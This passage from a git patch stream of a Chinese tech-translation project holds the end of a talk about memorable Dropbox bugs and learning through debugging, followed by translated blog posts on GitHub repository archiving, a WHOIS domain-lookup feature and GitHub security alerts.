+---------+-----+ + ^ | ^ + | | | + | | +----------+ | + | +---> | | | + | | CLIENT +--------+ + +--------+ | + +----------+ +``` + + +Here’s a vastly simplified diagram of Dropbox’s architecture. The desktop client runs on your local computer listening for changes in the file system. When it notices a changed file, it reads the file, then hashes the contents in 4MB blocks. These blocks are stored in the backend in a giant key-value store that we call blockserver. The key is the digest of the hashed contents, and the values are the contents themselves. + +Of course, we want to avoid uploading the same block multiple times. You can imagine that if you’re writing a document, you’re probably mostly changing the end – we don’t want to upload the beginning over and over. So before uploading a block to the blockserver the client talks to a different server that’s responsible for managing metadata and permissions, among other things. The client asks metaserver whether it needs the block or has seen it before. The “metaserver” responds with whether or not each block needs to be uploaded. + +So the request and response look roughly like this: The client says, “I have a changed file made up of blocks with hashes `'abcd,deef,efgh'`”. The server responds, “I have those first two, but upload the third.” Then the client sends the block up to the blockserver. + + +``` + +--------------+ +---------------+ + | | | | + | METASERVER | | BLOCKSERVER | + | | | | + +-+--+---------+ +---------+-----+ + ^ | ^ + | | 'ok, ok, need' | +'abcd,deef,efgh' | | +----------+ | efgh: [contents] + | +---> | | | + | | CLIENT +--------+ + +--------+ | + +----------+ +``` + + + +That’s the setup. So here’s the bug. + + + +``` + +--------------+ + | | + | METASERVER | + | | + +-+--+---------+ + ^ | + | | '???' +'abcdldeef,efgh' | | +----------+ + ^ | +---> | | + ^ | | CLIENT + + +--------+ | + +----------+ +``` + +Sometimes the client would make a weird request: each hash value should have been sixteen characters long, but instead it was thirty-three characters long – twice as many plus one. The server wouldn’t know what to do with this and would throw an exception. We’d see this exception get reported, and we’d go look at the log files from the desktop client, and really weird stuff would be going on – the client’s local database had gotten corrupted, or python would be throwing MemoryErrors, and none of it would make sense. + +If you’ve never seen this problem before, it’s totally mystifying. But once you’d seen it once, you can recognize it every time thereafter. Here’s a hint: the middle character of each 33-character string that we’d often see instead of a comma was `l`. These are the other characters we’d see in the middle position: + + +``` +l \x0c < $ ( . - +``` + +The ordinal value for an ascii comma – `,` – is 44\. The ordinal value for `l` is 108\. In binary, here’s how those two are represented: + +``` +bin(ord(',')): 0101100 +bin(ord('l')): 1101100 +``` + +You’ll notice that an `l` is exactly one bit away from a comma. And herein lies your problem: a bitflip. One bit of memory that the desktop client is using has gotten corrupted, and now the desktop client is sending a request to the server that is garbage. + +And here are the other characters we’d frequently see instead of the comma when a different bit had been flipped. + + + +``` +, : 0101100 +l : 1101100 +\x0c : 0001100 +< : 0111100 +$ : 0100100 +( : 0101000 +. : 0101110 +- : 0101101 +``` + + +### Bitflips are real! + +I love this bug because it shows that bitflips are a real thing that can happen, not just a theoretical concern. In fact, there are some domains where they’re more common than others. One such domain is if you’re getting requests from users with low-end or old hardware, which is true for a lot of laptops running Dropbox. Another domain with lots of bitflips is outer space – there’s no atmosphere in space to protect your memory from energetic particles and radiation, so bitflips are pretty common. + +You probably really care about correctness in space – your code might be keeping astronauts alive on the ISS, for example, but even if it’s not mission-critical, it’s hard to do software updates to space. If you really need your application to defend against bitflips, there are a variety of hardware & software approaches you can take, and there’s a [very interesting talk][6] by Katie Betchold about this. + +Dropbox in this context doesn’t really need to protect against bitflips. The machine that is corrupting memory is a user’s machine, so we can detect if the bitflip happens to fall in the comma – but if it’s in a different character we don’t necessarily know it, and if the bitflip is in the actual file data read off of disk, then we have no idea. There’s a pretty limited set of places where we could address this, and instead we decide to basically silence the exception and move on. Often this kind of bug resolves after the client restarts. + +### Unlikely bugs aren’t impossible + +This is one of my favorite bugs for a couple of reasons. The first is that it’s a reminder of the difference between unlikely and impossible. At sufficient scale, unlikely events start to happen at a noticable rate. + +### Social bugs + +My second favorite thing about this bug is that it’s a tremendously social one. This bug can crop up anywhere that the desktop client talks to the server, which is a lot of different endpoints and components in the system. This meant that a lot of different engineers at Dropbox would see versions of the bug. The first time you see it, you can  _really_  scratch your head, but after that it’s easy to diagnose, and the investigation is really quick: you look at the middle character and see if it’s an `l`. + +### Cultural differences + +One interesting side-effect of this bug was that it exposed a cultural difference between the server and client teams. Occasionally this bug would be spotted by a member of the server team and investigated from there. If one of your  _servers_  is flipping bits, that’s probably not random chance – it’s probably memory corruption, and you need to find the affected machine and get it out of the pool as fast as possible or you risk corrupting a lot of user data. That’s an incident, and you need to respond quickly. But if the user’s machine is corrupting data, there’s not a lot you can do. + +### Share your bugs + +So if you’re investigating a confusing bug, especially one in a big system, don’t forget to talk to people about it. Maybe your colleagues have seen a bug shaped like this one before. If they have, you might save a lot of time. And if they haven’t, don’t forget to tell people about the solution once you’ve figured it out – write it up or tell the story in your team meeting. Then the next time your teams hits something similar, you’ll all be more prepared. + +### How bugs can help you learn + +### Recurse Center + +Before I joined Dropbox, I worked for the Recurse Center. The idea behind RC is that it’s a community of self-directed learners spending time together getting better as programmers. That is the full extent of the structure of RC: there’s no curriculum or assignments or deadlines. The only scoping is a shared goal of getting better as a programmer. We’d see people come to participate in the program who had gotten CS degrees but didn’t feel like they had a solid handle on practical programming, or people who had been writing Java for ten years and wanted to learn Clojure or Haskell, and many other profiles as well. + +My job there was as a facilitator, helping people make the most of the lack of structure and providing guidance based on what we’d learned from earlier participants. So my colleagues and I were very interested in the best techniques for learning for self-motivated adults. + +### Deliberate Practice + +There’s a lot of different research in this space, and one of the ones I think is most interesting is the idea of deliberate practice. Deliberate practice is an attempt to explain the difference in performance between experts & amateurs. And the guiding principle here is that if you look just at innate characteristics – genetic or otherwise – they don’t go very far towards explaining the difference in performance. So the researchers, originally Ericsson, Krampe, and Tesch-Romer, set out to discover what did explain the difference. And what they settled on was time spent in deliberate practice. + +Deliberate practice is pretty narrow in their definition: it’s not work for pay, and it’s not playing for fun. You have to be operating on the edge of your ability, doing a project appropriate for your skill level (not so easy that you don’t learn anything and not so hard that you don’t make any progress). You also have to get immediate feedback on whether or not you’ve done the thing correctly. + +This is really exciting, because it’s a framework for how to build expertise. But the challenge is that as programmers this is really hard advice to apply. It’s hard to know whether you’re operating at the edge of your ability. Immediate corrective feedback is very rare – in some cases you’re lucky to get feedback ever, and in other cases maybe it takes months. You can get quick feedback on small things in the REPL and so on, but if you’re making a design decision or picking a technology, you’re not going to get feedback on those things for quite a long time. + +But one category of programming where deliberate practice is a useful model is debugging. If you wrote code, then you had a mental model of how it worked when you wrote it. But your code has a bug, so your mental model isn’t quite right. By definition you’re on the boundary of your understanding – so, great! You’re about to learn something new. And if you can reproduce the bug, that’s a rare case where you can get immediate feedback on whether or not your fix is correct. + +A bug like this might teach you something small about your program, or you might learn something larger about the system your code is running in. Now I’ve got a story for you about a bug like that. + +### Bug #2 + +This bug also one that I encountered at Dropbox. At the time, I was investigating why some desktop client weren’t sending logs as consistently as we expected. I’d started digging into the client logging system and discovered a bunch of interesting bugs. I’ll tell you only the subset of those bugs that is relevant to this story. + +Again here’s a very simplified architecture of the system. + + +``` + +--------------+ + | | + +---+ +----------> | LOG SERVER | + |log| | | | + +---+ | +------+-------+ + | | + +-----+----+ | 200 ok + | | | + | CLIENT | <-----------+ + | | + +-----+----+ + ^ + +--------+--------+--------+ + | ^ ^ | + +--+--+ +--+--+ +--+--+ +--+--+ + | log | | log | | log | | log | + | | | | | | | | + | | | | | | | | + +-----+ +-----+ +-----+ +-----+ +``` + +The desktop client would generate logs. Those logs were compress, encrypted, and written to disk. Then every so often the client would send them up to the server. The client would read a log off of disk and send it to the log server. The server would decrypt it and store it, then respond with a 200. + +If the client couldn’t reach the log server, it wouldn’t let the log directory grow unbounded. After a certain point it would start deleting logs to keep the directory under a maximum size. + +The first two bugs were not a big deal on their own. The first one was that the desktop client sent logs up to the server starting with the oldest one instead of starting with the newest. This isn’t really what you want – for example, the server would tell the client to send logs if the client reported an exception, so probably you care about the logs that just happened and not the oldest logs that happen to be on disk. + +The second bug was similar to the first: if the log directory hit its maximum size, the client would delete the logs starting with the newest instead of starting with the oldest. Again, you lose log files either way, but you probably care less about the older ones. + +The third bug had to do with the encryption. Sometimes, the server would be unable to decrypt a log file. (We generally didn’t figure out why – maybe it was a bitflip.) We weren’t handling this error correctly on the backend, so the server would reply with a 500\. The client would behave reasonably in the face of a 500: it would assume that the server was down. So it would stop sending log files and not try to send up any of the others. + +Returning a 500 on a corrupted log file is clearly not the right behavior. You could consider returning a 400, since it’s a problem with the client request. But the client also can’t fix the problem – if the log file can’t be decrypted now, we’ll never be able to decrypt it in the future. What you really want the client to do is just delete the log and move on. In fact, that’s the default behavior when the client gets a 200 back from the server for a log file that was successfully stored. So we said, ok – if the log file can’t be decrypted, just return a 200. + +All of these bugs were straightforward to fix. The first two bugs were on the client, so we’d fixed them on the alpha build but they hadn’t gone out to the majority of clients. The third bug we fixed on the server and deployed. + +### 📈 + +Suddenly traffic to the log cluster spikes. The serving team reaches out to us to ask if we know what’s going on. It takes me a minute to put all the pieces together. + +Before these fixes, there were four things going on: + +1. Log files were sent up starting with the oldest + +2. Log files were deleted starting with the newest + +3. If the server couldn’t decrypt a log file it would 500 + +4. If the client got a 500 it would stop sending logs + +A client with a corrupted log file would try to send it, the server would 500, the client would give up sending logs. On its next run, it would try to send the same file again, fail again, and give up again. Eventually the log directory would get full, at which point the client would start deleting its newest files, leaving the corrupted one on disk. + +The upshot of these three bugs: if a client ever had a corrupted log file, we would never see logs from that client again. + +The problem is that there were a lot more clients in this state than we thought. Any client with a single corrupted file had been dammed up from sending logs to the server. Now that dam was cleared, and all of them were sending up the rest of the contents of their log directories. + +### Our options + +Ok, there’s a huge flood of traffic coming from machines around the world. What can we do? (This is a fun thing about working at a company with Dropbox’s scale, and particularly Dropbox’s scale of desktop clients: you can trigger a self-DDOS very easily.) + +The first option when you do a deploy and things start going sideways is to rollback. Totally reasonable choice, but in this case, it wouldn’t have helped us. The state that we’d transformed wasn’t the state on the server but the state on the client – we’d deleted those files. Rolling back the server would prevent additional clients from entering this state but it wouldn’t solve the problem. + +What about increasing the size of the logging cluster? We did that – and started getting even more requests, now that we’d increased our capacity. We increased it again, but you can’t do that forever. Why not? This cluster isn’t isolated. It’s making requests into another cluster, in this case to handle exceptions. If you have a DDOS pointed at one cluster, and you keep scaling that cluster, you’re going to knock over its depedencies too, and now you have two problems. + +Another option we considered was shedding load – you don’t need every single log file, so can we just drop requests. One of the challenges here was that we didn’t have an easy way to tell good traffic from bad. We couldn’t quickly differentiate which log files were old and which were new. + +The solution we hit on is one that’s been used at Dropbox on a number of different occassions: we have a custom header, `chillout`, which every client in the world respects. If the client gets a response with this header, then it doesn’t make any requests for the provided number of seconds. Someone very wise added this to the Dropbox client very early on, and it’s come in handy more than once over the years. The logging server didn’t have the ability to set that header, but that’s an easy problem to solve. So two of my colleagues, Isaac Goldberg and John Lai, implemented support for it. We set the logging cluster chillout to two minutes initially and then managed it down as the deluge subsided over the next couple of days. + +### Know your system + +The first lesson from this bug is to know your system. I had a good mental model of the interaction between the client and the server, but I wasn’t thinking about what would happen when the server was interacting with all the clients at once. There was a level of complexity that I hadn’t thought all the way through. + +### Know your tools + +The second lesson is to know your tools. If things go sideways, what options do you have? Can you reverse your migration? How will you know if things are going sideways and how can you discover more? All of those things are great to know before a crisis – but if you don’t, you’ll learn them during a crisis and then never forget. + +### Feature flags & server-side gating + +The third lesson is for you if you’re writing a mobile or a desktop application:  _You need server-side feature gating and server-side flags._  When you discover a problem and you don’t have server-side controls, the resolution might take days or weeks as you push out a new release or submit a new version to the app store. That’s a bad situation to be in. The Dropbox desktop client isn’t going through an app store review process, but just pushing out a build to tens of millions of clients takes time. Compare that to hitting a problem in your feature and flipping a switch on the server: ten minutes later your problem is resolved. + +This strategy is not without its costs. Having a bunch of feature flags in your code adds to the complexity dramatically. You get a combinatoric problem with your testing: what if feature A is enabled and feature B, or just one, or neither – multiplied across N features. It’s extremely difficult to get engineers to clean up their feature flags after the fact (and I was also guilty of this). Then for the desktop client there’s multiple versions in the wild at the same time, so it gets pretty hard to reason about. + +But the benefit – man, when you need it, you really need it. + +# How to love bugs + +I’ve talked about some bugs that I love and I’ve talked about why to love bugs. Now I want to tell you how to love bugs. If you don’t love bugs yet, I know of exactly one way to learn, and that’s to have a growth mindset. + +The sociologist Carol Dweck has done a ton of interesting research about how people think about intelligence. She’s found that there are two different frameworks for thinking about intelligence. The first, which she calls the fixed mindset, holds that intelligence is a fixed trait, and people can’t change how much of it they have. The other mindset is a growth mindset. Under a growth mindset, people believe that intelligence is malleable and can increase with effort. + +Dweck found that a person’s theory of intelligence – whether they hold a fixed or growth mindset – can significantly influence the way they select tasks to work on, the way they respond to challenges, their cognitive performance, and even their honesty. + +[I also talked about a growth mindset in my Kiwi PyCon keynote, so here are just a few excerpts. You can read the full transcript [here][7].] + +Findings about honesty: + +> After this, they had the students write letters to pen pals about the study, saying “We did this study at school, and here’s the score that I got.” They found that  _almost half of the students praised for intelligence lied about their scores_ , and almost no one who was praised for working hard was dishonest. + +On effort: + +> Several studies found that people with a fixed mindset can be reluctant to really exert effort, because they believe it means they’re not good at the thing they’re working hard on. Dweck notes, “It would be hard to maintain confidence in your ability if every time a task requires effort, your intelligence is called into question.” + +On responding to confusion: + +> They found that students with a growth mindset mastered the material about 70% of the time, regardless of whether there was a confusing passage in it. Among students with a fixed mindset, if they read the booklet without the confusing passage, again about 70% of them mastered the material. But the fixed-mindset students who encountered the confusing passage saw their mastery drop to 30%. Students with a fixed mindset were pretty bad at recovering from being confused. + +These findings show that a growth mindset is critical while debugging. We have to recover from confusion, be candid about the limitations of our understanding, and at times really struggle on the way to finding solutions – all of which is easier and less painful with a growth mindset. + +### Love your bugs + +I learned to love bugs by explicitly celebrating challenges while working at the Recurse Center. A participant would sit down next to me and say, “[sigh] I think I’ve got a weird Python bug,” and I’d say, “Awesome, I  _love_  weird Python bugs!” First of all, this is definitely true, but more importantly, it emphasized to the participant that finding something where they struggled an accomplishment, and it was a good thing for them to have done that day. + +As I mentioned, at the Recurse Center there are no deadlines and no assignments, so this attitude is pretty much free. I’d say, “You get to spend a day chasing down this weird bug in Flask, how exciting!” At Dropbox and later at Pilot, where we have a product to ship, deadlines, and users, I’m not always uniformly delighted about spending a day on a weird bug. So I’m sympathetic to the reality of the world where there are deadlines. However, if I have a bug to fix, I have to fix it, and being grumbly about the existence of the bug isn’t going to help me fix it faster. I think that even in a world where deadlines loom, you can still apply this attitude. + +If you love your bugs, you can have more fun while you’re working on a tough problem. You can be less worried and more focused, and end up learning more from them. Finally, you can share a bug with your friends and colleagues, which helps you and your teammates. + +### Obrigada! + +My thanks to folks who gave me feedback on this talk and otherwise contributed to my being there: + +* Sasha Laundy + +* Amy Hanlon + +* Julia Evans + +* Julian Cooper + +* Raphael Passini Diniz and the rest of the Python Brasil organizing team + +-------------------------------------------------------------------------------- + +via: http://akaptur.com/blog/2017/11/12/love-your-bugs/ + +作者:[Allison Kaptur ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://akaptur.com/about/ +[1]:http://2017.pythonbrasil.org.br/# +[2]:http://www.youtube.com/watch?v=h4pZZOmv4Qs +[3]:http://www.pilot.com/ +[4]:http://www.dropbox.com/ +[5]:http://www.recurse.com/ +[6]:http://www.youtube.com/watch?v=ETgNLF_XpEM +[7]:http://akaptur.com/blog/2015/10/10/effective-learning-strategies-for-programmers/ From 83af56b418159200225093801e6e1a72dff8fe76 Mon Sep 17 00:00:00 2001 From: geekpi Date: Mon, 4 Dec 2017 10:31:46 +0800 Subject: [PATCH 0219/1627] Update 20170910 Cool vim feature sessions.md --- translated/tech/20170910 Cool vim feature sessions.md | 3 --- 1 file changed, 3 deletions(-) diff --git a/translated/tech/20170910 Cool vim feature sessions.md b/translated/tech/20170910 Cool vim feature sessions.md index 462d6362b2..49ee43fda1 100644 --- a/translated/tech/20170910 Cool vim feature sessions.md +++ b/translated/tech/20170910 Cool vim feature sessions.md @@ -1,6 +1,3 @@ -translating---geekpi - -Cool vim feature: sessions! vim 的酷功能:会话! ============================================================• From f2f4b856e7c4d37846ad373a2cb0b031191f648d Mon Sep 17 00:00:00 2001 From: geekpi Date: Mon, 4 Dec 2017 10:32:41 +0800 Subject: [PATCH 0220/1627] translated --- .../tech/20171108 Archiving repositories.md | 39 ------------------- .../tech/20171108 Archiving repositories.md | 37 ++++++++++++++++++ 2 files changed, 37 insertions(+), 39 deletions(-) delete mode 100644 sources/tech/20171108 Archiving repositories.md create mode 100644 translated/tech/20171108 Archiving repositories.md diff --git a/sources/tech/20171108 Archiving repositories.md b/sources/tech/20171108 Archiving repositories.md deleted file mode 100644 index 4038ca8a9f..0000000000 --- a/sources/tech/20171108 Archiving repositories.md +++ /dev/null @@ -1,39 +0,0 @@ -translating---geekpi - -Archiving repositories -==================== - - -Just because a repository isn't actively developed anymore and you don't want to accept additional contributions doesn't mean you want to delete it. Now archive repositories on GitHub to make them read-only. - - [![archived repository banner](https://user-images.githubusercontent.com/7321362/32558403-450458dc-c46a-11e7-96f9-af31d2206acb.png)][1] - -Archiving a repository makes it read-only to everyone (including repository owners). This includes editing the repository, issues, pull requests, labels, milestones, projects, wiki, releases, commits, tags, branches, reactions and comments. No one can create new issues, pull requests, or comments on an archived repository, but you can still fork archived repositories—allowing development to continue elsewhere for archived open source projects. - -To archive a repository, go to your Repository Settings Page and click Archive this repository. - - [![archive repository button](https://user-images.githubusercontent.com/125011/32273119-0fc5571e-bef9-11e7-9909-d137268a1d6d.png)][2] - -Before archiving your repository, make sure you've changed its settings and consider closing all open issues and pull requests. You should also update your README and description to make it clear to visitors that it's no longer possible to contribute. - -If you change your mind and want to unarchive your repository, click Unarchive this repositoryin the same place. Please note that most archived repository settings are hidden and you'll have to unarchive the repository to change them. - - [![archived labelled repository](https://user-images.githubusercontent.com/125011/32541128-9d67a064-c466-11e7-857e-3834054ba3c9.png)][3] - -To learn more, check out [the documentation][4] on archiving repositories. Happy archiving! - --------------------------------------------------------------------------------- - -via: https://github.com/blog/2460-archiving-repositories - -作者:[MikeMcQuaid ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://github.com/MikeMcQuaid -[1]:https://user-images.githubusercontent.com/7321362/32558403-450458dc-c46a-11e7-96f9-af31d2206acb.png -[2]:https://user-images.githubusercontent.com/125011/32273119-0fc5571e-bef9-11e7-9909-d137268a1d6d.png -[3]:https://user-images.githubusercontent.com/125011/32541128-9d67a064-c466-11e7-857e-3834054ba3c9.png -[4]:https://help.github.com/articles/about-archiving-repositories/ diff --git a/translated/tech/20171108 Archiving repositories.md b/translated/tech/20171108 Archiving repositories.md new file mode 100644 index 0000000000..3d1a328541 --- /dev/null +++ b/translated/tech/20171108 Archiving repositories.md @@ -0,0 +1,37 @@ +归档仓库 +==================== + + +因为仓库不再活跃开发或者你不想接受额外的贡献并不意味着你想要删除它。现在在 Github 上归档仓库让它变成只读。 + + [![archived repository banner](https://user-images.githubusercontent.com/7321362/32558403-450458dc-c46a-11e7-96f9-af31d2206acb.png)][1] + +归档一个仓库让它对所有人只读(包括仓库拥有者)。这包括编辑仓库、问题、合并请求、标记、里程碑、维基、发布、提交、标签、分支、反馈和评论。没有人可以在一个归档的仓库上创建新的问题、合并请求或者评论,但是你仍可以 fork 仓库-允许归档的仓库在其他地方继续开发。 + +要归档一个仓库,进入仓库设置页面并点在这个仓库上点击归档。 + + [![archive repository button](https://user-images.githubusercontent.com/125011/32273119-0fc5571e-bef9-11e7-9909-d137268a1d6d.png)][2] + +在归档你的仓库前,确保你已经更改了它的设置并考虑关闭所有的开放问题和合并请求。你还应该更新你的 README 和描述来让它让访问者了解他不再能够贡献。 + +如果你改变了主意想要解除归档你的仓库,在相同的地方点击解除归档。请注意大多数归档仓库的设置是隐藏的,并且你需要解除归档来改变它们。 + + [![archived labelled repository](https://user-images.githubusercontent.com/125011/32541128-9d67a064-c466-11e7-857e-3834054ba3c9.png)][3] + +要了解更多,请查看[这份文档][4]中的归档仓库部分。归档快乐! + +-------------------------------------------------------------------------------- + +via: https://github.com/blog/2460-archiving-repositories + +作者:[MikeMcQuaid ][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://github.com/MikeMcQuaid +[1]:https://user-images.githubusercontent.com/7321362/32558403-450458dc-c46a-11e7-96f9-af31d2206acb.png +[2]:https://user-images.githubusercontent.com/125011/32273119-0fc5571e-bef9-11e7-9909-d137268a1d6d.png +[3]:https://user-images.githubusercontent.com/125011/32541128-9d67a064-c466-11e7-857e-3834054ba3c9.png +[4]:https://help.github.com/articles/about-archiving-repositories/ From a760d08600f1a53d1fb6276bffec1c998d8da2d9 Mon Sep 17 00:00:00 2001 From: geekpi Date: Mon, 4 Dec 2017 10:35:58 +0800 Subject: [PATCH 0221/1627] translated --- ...every domain someone owns automatically.md | 52 ------------------- ...every domain someone owns automatically.md | 49 +++++++++++++++++ 2 files changed, 49 insertions(+), 52 deletions(-) delete mode 100644 sources/tech/20171130 New Feature Find every domain someone owns automatically.md create mode 100644 translated/tech/20171130 New Feature Find every domain someone owns automatically.md diff --git a/sources/tech/20171130 New Feature Find every domain someone owns automatically.md b/sources/tech/20171130 New Feature Find every domain someone owns automatically.md deleted file mode 100644 index c3371b8376..0000000000 --- a/sources/tech/20171130 New Feature Find every domain someone owns automatically.md +++ /dev/null @@ -1,52 +0,0 @@ -translating---geekpi - - -New Feature: Find every domain someone owns automatically -============================================================ - - -Today, we are excited to announce our latest feature which we have been working on for the past weeks. It is the Whois aggregation tool that is now available on [DNSTrails][1]. - -In the past, searching for domain owners took lot of time, because most of the time you needed to have the domain names pointed to an IP address in order to find the rest of the domains owned by the same person. - -Using that old method you could easily lose hours and hours each day by researching and crossing results and data between one tool and another until you got the domain list you wanted. - -Thanks to this new tool and our intelligent [WHOIS database][2], now you can search for any domain name and get the full list of domains registered by that organization or person and get accurate results within seconds. - -### How can I use the Whois aggregation feature? - -Step 1: Open up [DNSTrails.com][3] - -Step 2: Search for any domain name, for example: godaddy.com - -Step 3: After you get the results for the domain name, locate the Whois information block as you see below: - -![Domain name search results](https://securitytrails.com/images/a/a/1/3/f/aa13fa3616b8dc313f925bdbf1da43a54856d463-image1.png) - -Step 4: You will notice there is a phone number and email address associated with the domain name. - -Step 5: Click on the links at the right, you will easily find the rest of the domain names registered with the same telephone and email address. - -![All domain names by the same owner](https://securitytrails.com/images/1/3/4/0/3/134037822d23db4907d421046b11f3cbb872f94f-image2.png) - -This means, that even if the domains doesn't even have IPs pointed at the registrar, we can still discover the rest of the domains if they use the same phone and mail address, pretty useful if you are investigating domain ownership from any individual on the Internet. - -Ever wanted to know which other domains are owned by a person? Try the [WHOIS aggregation feature][4] at [DNStrails][5] yourself or [get in touch with us for API access][6]. - --------------------------------------------------------------------------------- - -via: https://securitytrails.com/blog/find-every-domain-someone-owns - -作者:[SECURITYTRAILS TEAM ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://securitytrails.com/blog/find-every-domain-someone-owns -[1]:https://dnstrails.com/ -[2]:https://securitytrails.com/forensics -[3]:https://dnstrails.com/ -[4]:http://dnstrails.com/#/domain/domain/ueland.com -[5]:https://dnstrails.com/ -[6]:https://securitytrails.com/contact diff --git a/translated/tech/20171130 New Feature Find every domain someone owns automatically.md b/translated/tech/20171130 New Feature Find every domain someone owns automatically.md new file mode 100644 index 0000000000..4b72eaae5e --- /dev/null +++ b/translated/tech/20171130 New Feature Find every domain someone owns automatically.md @@ -0,0 +1,49 @@ +新功能:自动找出每个域名的拥有者 +============================================================ + + +今天,我们很高兴地宣布我们最近几周做的新功能。它是 Whois 聚合工具,现在可以在 [DNSTrails][1] 上获得。 + +在过去,查找一个域名的所有者会花费很多时间,因为大部分时间你都需要把域名指向一个 IP 地址,以便找到同一个人拥有的其他域名。 + +使用老的方法,你会很轻易地在一个工具和另外一个工具的研究和交叉比较结果中花费数个小时,直到得到你想要的域名。 + +感谢这个新工具和我们的智能[WHOIS 数据库][2],现在你可以搜索任何域名,并获得组织或个人注册的域名的完整列表,并在几秒钟内获得准确的结果。 + +### 我如何使用Whois聚合功能? + +第一步:打开 [DNSTrails.com][3] + +第二步:搜索任何域名,比如:godaddy.com + +第三步:在得到域名的结果后,如下所见,定位下面的 Whois 信息: + +![Domain name search results](https://securitytrails.com/images/a/a/1/3/f/aa13fa3616b8dc313f925bdbf1da43a54856d463-image1.png) + +第四步:你会看到那里有有关域名的电话和电子邮箱地址。 + +第五步:点击右边的链接,你会轻松地找到用相同电话和邮箱注册的域名。 + +![All domain names by the same owner](https://securitytrails.com/images/1/3/4/0/3/134037822d23db4907d421046b11f3cbb872f94f-image2.png) + +如果你正在调查互联网上任何个人的域名所有权,这意味着即使域名甚至没有指向注册服务商的 IP,如果他们使用相同的电话和邮件地址,我们仍然可以发现其他域名。 + +想知道一个人拥有的其他域名么?亲自试试 [DNStrails][5] 的[ WHOIS 聚合功能][4]或者[使用我们的 API 访问][6]。 + +-------------------------------------------------------------------------------- + +via: https://securitytrails.com/blog/find-every-domain-someone-owns + +作者:[SECURITYTRAILS TEAM ][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://securitytrails.com/blog/find-every-domain-someone-owns +[1]:https://dnstrails.com/ +[2]:https://securitytrails.com/forensics +[3]:https://dnstrails.com/ +[4]:http://dnstrails.com/#/domain/domain/ueland.com +[5]:https://dnstrails.com/ +[6]:https://securitytrails.com/contact From 664bae984d13431859ad40f3daf4e3355d8105b0 Mon Sep 17 00:00:00 2001 From: geekpi Date: Mon, 4 Dec 2017 10:38:27 +0800 Subject: [PATCH 0222/1627] translated --- ...6 Introducing security alerts on GitHub.md | 50 ------------------- ...6 Introducing security alerts on GitHub.md | 48 ++++++++++++++++++ 2 files changed, 48 insertions(+), 50 deletions(-) delete mode 100644 sources/tech/20171116 Introducing security alerts on GitHub.md create mode 100644 translated/tech/20171116 Introducing security alerts on GitHub.md diff --git a/sources/tech/20171116 Introducing security alerts on GitHub.md b/sources/tech/20171116 Introducing security alerts on GitHub.md deleted file mode 100644 index 1f00b5d4aa..0000000000 --- a/sources/tech/20171116 Introducing security alerts on GitHub.md +++ /dev/null @@ -1,50 +0,0 @@ -translating---geekpi - -Introducing security alerts on GitHub -==================================== - - -Last month, we made it easier for you to keep track of the projects your code depends on with the dependency graph, currently supported in Javascript and Ruby. Today, for the over 75 percent of GitHub projects that have dependencies, we’re helping you do more than see those important projects. With your dependency graph enabled, we’ll now notify you when we detect a vulnerability in one of your dependencies and suggest known fixes from the GitHub community. - - [![Security Alerts & Suggested Fix](https://user-images.githubusercontent.com/594029/32851987-76c36e4a-c9eb-11e7-98fc-feb39fddaadb.gif)][1] - -### How to start using security alerts - -Whether your projects are private or public, security alerts get vital vulnerability information to the right people on your team. - -Enable your dependency graph - -Public repositories will automatically have your dependency graph and security alerts enabled. For private repositories, you’ll need to opt in to security alerts in your repository settings or by allowing access in the Dependency graph section of your repository’s Insights tab. - -Set notification preferences - -When your dependency graph is enabled, admins will receive security alerts by default. Admins can also add teams or individuals as recipients for security alerts in the dependency graph settings. - -Respond to alerts - -When we notify you about a potential vulnerability, we’ll highlight any dependencies that we recommend updating. If a known safe version exists, we’ll select one using machine learning and publicly available data, and include it in our suggestion. - -### Vulnerability coverage - -Vulnerabilities that have [CVE IDs][2] (publicly disclosed vulnerabilities from the [National Vulnerability Database][3]) will be included in security alerts. However, not all vulnerabilities have CVE IDs—even many publicly disclosed vulnerabilities don't have them. We'll continue to get better at identifying vulnerabilities as our security data grows. For more help managing security issues, check out our [security partners in the GitHub Marketplace][4]. - -This is the next step in using the world’s largest collection of open source data to help you keep code safer and do your best work. The dependency graph and security alerts currently support Javascript and Ruby—with Python support coming in 2018. - -[Learn more about security alerts][5] - --------------------------------------------------------------------------------- - -via: https://github.com/blog/2470-introducing-security-alerts-on-github - -作者:[mijuhan ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://github.com/mijuhan -[1]:https://user-images.githubusercontent.com/594029/32851987-76c36e4a-c9eb-11e7-98fc-feb39fddaadb.gif -[2]:https://cve.mitre.org/ -[3]:https://nvd.nist.gov/ -[4]:https://github.com/marketplace/category/security -[5]:https://help.github.com/articles/about-security-alerts-for-vulnerable-dependencies/ diff --git a/translated/tech/20171116 Introducing security alerts on GitHub.md b/translated/tech/20171116 Introducing security alerts on GitHub.md new file mode 100644 index 0000000000..b8f0afba17 --- /dev/null +++ b/translated/tech/20171116 Introducing security alerts on GitHub.md @@ -0,0 +1,48 @@ +介绍 GitHub 上的安全警报 +==================================== + + +上个月,我们用依赖关系图让你更容易跟踪你代码依赖的的项目,目前支持 Javascript 和 Ruby。如今,超过 75% 的 GitHub 项目有依赖,我们正在帮助你做更多的事情,而不只是关注那些重要的项目。在启用依赖关系图后,当我们检测到你的依赖中有漏洞或者来自 Github 社区中建议的已知修复时通知你。 + + [![Security Alerts & Suggested 